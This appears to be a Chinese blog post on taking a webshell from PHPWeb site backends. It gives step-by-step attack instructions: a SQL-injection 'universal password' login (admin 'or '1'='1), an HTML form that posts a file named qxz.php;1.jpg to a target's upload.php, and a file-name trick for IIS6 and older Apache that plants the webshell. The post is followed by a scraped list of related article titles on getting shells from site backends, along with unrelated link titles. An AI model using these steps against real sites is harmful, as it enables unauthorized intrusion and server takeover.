首先登录后台admin.php(默认后台admin.php)

有的phpweb网站存在万能密码登录

帐号密码都输入:admin 'or '1'='1直接登录

登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把www.xxx.com 改成你的目标网站地址。

<form name="uploadForm" method="post" enctype="multipart/form-data"action="http://www.xxx.com/kedit/upload_cgi/upload.php">
<input type="text" name="fileName" value="qxz.php;1.jpg" />
<input type="hidden" name="attachPath" value="news/pics/" />
<input type="file" name="fileData" size="14" /></td>
<input type="submit" name="button" value="确定" />
</form>

然后选择你的马儿再上传

上传后如果为iis6,就点击查看源码就可以找到马儿的路径了。

PS:qxz.php;1.jpg这样的文件是允许上传的,只要服务器是IIS6就拿到webshell,低版本的apache可以试着重命名为qxz.php.jpg

phpweb后台拿shell方法相关推荐

  1. phpweb后台拿shell简单方法

    关于phpweb后台拿shell简单方法. 首先登录后台admin.php 登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地 ...

  2. 网站后台拿shell方法总结

    今日带给大伙的都是些手艺上的总结,有些人老问经验怎么来的,这个即是经验,盼愿大伙都能成为脚本妙手. 动网上传漏洞,信任大伙拿下不少肉鸡吧.可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然全 ...

  3. Ecshop后台拿shell方法总结

    方法一:龙儿心发明的,版本未定,估计都行. 进入后台-系统设置-Flash播放器管理 可以上传任意文件. [includes/fckeditor /editor/filemanager/connect ...

  4. php用户管理拿shell,PHPWEB网站管理系统后台拿shell

    前几天贫道拿一个IDC的分站 看到了PHPWEB 于是默认的进入了后台 不过进去之后拿shell难住了 妹夫的 去百度一下 那个方法失效 版本: V1.4.3 / 20100925 无奈中 于是在刁科 ...

  5. 帝国 loginjs.php,帝国cms 6.6 后台拿shell

    时间:2013-02-27来源:源码库 作者:源码库 文章热度: ℃ 漏洞作者: 付弘雪 提交时间: 2013-01-21 公开时间: 2013-01-21 漏洞类型: 文件上传导致任意代码执行 简要 ...

  6. 后台得到webshell方法大汇总

    动网上传漏洞,相信大家拿下不少肉鸡吧.可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞.在拿站过程中,我们经常费了九牛 ...

  7. joomla后台拿shell

    整理了joomla后台拿shell的几种方法,不解释,至于怎么进后台晓得也不晓得- 第一种 官网下载joomla中文包com_zmaxappstore.zip,解压修改install.xml 添加&l ...

  8. 后台拿shell全集

    正学习后台拿Shell的方法,今天碰巧在网上看见得到后台拿shell的汇总全集,很不错的总结,分享了!版主给个精华吧!   今天带给大家的都是些技术上的总结,有些人老问经验怎么来的,这个就是经验,希望 ...

  9. 渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试

    文章目录 相关博客 反弹shell介绍 常用反弹方式 NetCat(NC)反弹 正向NC 反向NC Telnet反弹 正向shell 反向shell OpenSSL Curl 相关博客 Linux信息 ...

最新文章

  1. 【Pandas库】(3) DataFrame的创建方法及基本操作
  2. filco蓝牙不好用_2020双十二机械键盘选购 牌子推荐 附雷柏/ikbc/akko/杜伽/FILCO热销机械键盘品牌...
  3. 计算机网络是由一组结点组成吗,分布式数据库系统是由一组数据组成的,这组数据分布在计算机网络的不同计算机上,网络中的每个结点_考题宝...
  4. [云炬创业基础笔记]第四章测试19
  5. activiti 工作流_一文让你读懂什么是Activiti工作流
  6. React开发(246):react项目理解 this打印
  7. 前端学习(635):字符串拼接
  8. 协程asyncio_Asyncio深入浅出
  9. Activiti启动某个流程失败,页面报500
  10. Ubuntu16.04 LTS下apt安装WireShark
  11. [Luogu] 模板题-最近公共祖先
  12. python编程语言继承_如何使用Python继承机制(子类化内置类型)
  13. android虚拟摇杆
  14. csr蓝牙驱动Linux,csr harmony蓝牙适配器驱动
  15. 解决CondaVerificationError: The package for pytorch located at...
  16. Unity 3D模型展示之拖拽
  17. 个人小程序和企业小程序
  18. 网状结构的“数据”区域
  19. poi-tl导出word;自定义列表序号和表格宽度,表格合并,自定义标题,更新目录
  20. matlab之矩阵输入(一)

热门文章

  1. CSS3基础知识及详情
  2. [学习笔记]EMD经验模式分解
  3. 华为路由器 端口映射与防火墙
  4. 如何打包你的 Python 代码
  5. (转)哈佛学生的4年大学生活
  6. Android分区详解:boot, system, recovery, data, cache 以及 misc
  7. 信息安全——加密与认证
  8. 社保和公积金查询办法(深圳、武汉、北京)
  9. IRQ与FIQ的区别
  10. 跟着团子学SAP PS:通过项目挣值分析(EVM)评估项目绩效与进展 CNE1/CNE5